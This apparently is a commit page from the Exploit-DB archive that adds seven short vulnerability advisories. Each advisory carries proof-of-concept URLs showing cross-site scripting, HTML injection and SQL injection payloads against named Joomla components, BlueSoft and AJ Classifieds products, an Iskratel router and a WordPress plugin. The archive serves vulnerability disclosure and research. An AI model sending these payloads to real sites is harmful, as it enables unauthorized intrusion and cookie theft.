Update: 2015-02-03
7 new exploits
This commit is contained in:
Offensive Security
parent
c1539379ff
commit
e97ed109f5
8 changed files with 76 additions and 0 deletions
|
|
@ -32395,3 +32395,10 @@ id,file,description,date,author,platform,type,port
|
|||
35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
|
||||
35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
|
||||
35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
|
||||
35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross Site Scripting Vulnerability",2011-07-15,SOLVER,php,webapps,0
|
||||
35966,platforms/php/webapps/35966.txt,"Joomla! 'com_newssearch' Component SQL Injection Vulnerability",2011-07-15,"Robert Cooper",php,webapps,0
|
||||
35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
|
||||
35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products Multiple SQL Injection Vulnerabilities",2011-07-18,Lazmania61,php,webapps,0
|
||||
35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS SQL Injection Vulnerability",2011-07-17,Lazmania61,php,webapps,0
|
||||
35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ Cross Site Request Forgery and HTML Injection Vulnerabilities",2011-07-18,MustLive,hardware,remote,0
|
||||
35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
15
platforms/hardware/remote/35970.txt
Executable file
15
platforms/hardware/remote/35970.txt
Executable file
|
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/48711/info
|
||||
|
||||
The Iskratel SI2000 Callisto 821+ is prone to a cross-site request-forgery vulnerability and multiple HTML-injection vulnerabilities.
|
||||
|
||||
An attacker can exploit the cross-site request-forgery issue to perform unauthorized actions in the context of a user's session. This may aid in other attacks.
|
||||
|
||||
The attacker can exploit the HTML-injection issues to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered. Other attacks are also possible.
|
||||
|
||||
http://www.example.com/configuration/lan_create_service.html?EmWeb_ns:vim:9=%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
||||
|
||||
http://www.example.com/configuration/lan_create_service.html?EmWeb_ns:vim:10=%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
||||
|
||||
http://www.example.com/configuration/lan_create_service.html?EmWeb_ns:vim:11=%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
||||
|
||||
http://www.example.com/configuration/lan_create_service.html?EmWeb_ns:vim:15=%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
||||
7
platforms/php/webapps/35965.txt
Executable file
7
platforms/php/webapps/35965.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/48692/info
|
||||
|
||||
The 'com_resman' component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/index.php?option=com_resman&task=list&city=<BODY%20ONLOAD=alert("SOLVER")>
|
||||
7
platforms/php/webapps/35966.txt
Executable file
7
platforms/php/webapps/35966.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/48698/info
|
||||
|
||||
The 'com_newssearch' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_newssearch&type=detail§ion=2&id=15'
|
||||
7
platforms/php/webapps/35967.txt
Executable file
7
platforms/php/webapps/35967.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/48702/info
|
||||
|
||||
AJ Classifieds is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/demo/ajclassifieds/classifiedsauto/index.php?do=detaillisting&listingid=77â??a
|
||||
12
platforms/php/webapps/35968.txt
Executable file
12
platforms/php/webapps/35968.txt
Executable file
|
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/48703/info
|
||||
|
||||
Multiple BlueSoft products are prone to multiple SQL-injection vulnerabilities because the applications fail to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
|
||||
http://www.example.com/demo5/search.php?realtor=2â??a
|
||||
|
||||
http://www.example.com/demo4/item.php?id=94edd43315507ad8509d7bfb2d2bc936â??a
|
||||
|
||||
http://www.example.com/demo3/search.php?c=47â??a
|
||||
7
platforms/php/webapps/35969.txt
Executable file
7
platforms/php/webapps/35969.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/48707/info
|
||||
|
||||
BlueSoft Social Networking CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/demo/user_profile.php?view=photo&photo_id=82â??a
|
||||
14
platforms/php/webapps/35971.txt
Executable file
14
platforms/php/webapps/35971.txt
Executable file
|
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/48714/info
|
||||
|
||||
The bSuite plug-in for WordPress is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks may also be possible.
|
||||
|
||||
bSuite versions 4.0.7 and prior are vulnerable.
|
||||
|
||||
|
||||
The following example URIs are available:
|
||||
|
||||
http://www.example.com/wordpress/?s=<h2>XSSED</h2>
|
||||
|
||||
http://www.example.com/wordpress/?p=1&<h1>XSSED</h1>
|
||||
Loading…
Add table
Reference in a new issue